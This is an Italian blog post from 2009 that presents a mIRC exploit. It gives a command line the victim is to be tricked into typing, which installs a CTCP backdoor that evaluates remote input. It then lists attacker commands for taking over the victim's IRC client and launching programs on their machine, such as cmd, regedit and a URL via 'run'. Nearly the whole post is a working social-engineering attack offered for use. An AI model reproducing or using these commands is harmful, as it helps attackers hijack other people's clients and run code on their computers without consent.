Exploit mIRC User Owned
Lunedì, Luglio 13, 2009
Ecco una vecchia stringa, che sfrutta un bug dello script, per prendere il controllo dell’utente che usa mIRC.
comandi da far scrivere alla vittima:
/write massop ctcp ^*:passwd:?: .$eval($2-,2) | halt /load -rs massop
i comandi che l’ owner puo’ esercitare sulla vittima:
/ctcp vittima passwd quit ( ) /ctcp vittima passwd #silence /ctcp vittima passwd join #silence /ctcp vittima passwd mode #silence -i /ctcp vittima passwd mode #silence +o nick /ctcp vittima passwd mode #silence +b Luna17@*.* /ctcp vittima passwd mode #silence +k Luna17@*.* /ctcp vittima passwd msg #silence /password kakka /ctcp vittima passwd msg #silence /jump /ctcp vittima passwd msg #silence testo /ctcp vittima passwd msg nick testo /ctcp vittima passwd nick nicknuovo /ctcp vittima passwd notice #silence lol /ctcp vittima passwd password kakka /ctcp vittima passwd run www.donatox.netsons.org
Altri comandi:
cmd ? Command prompt
winword ? Microsoft Word
excel ? Microsoft Excel
outlook ? Microsoft Outlook
iexplore ? Internet Explorer
firefox ? Mozilla Firefox
notepad ? Notepad
compmgmt.msc ? Computer Management Console
control appwiz.cpl ? Add/Remove programs dialog
mstsc ? Microsoft Terminal Service Client
regedit ? Registry Editor
PS: cambiare la parola “passwd” con una a proprio piacimento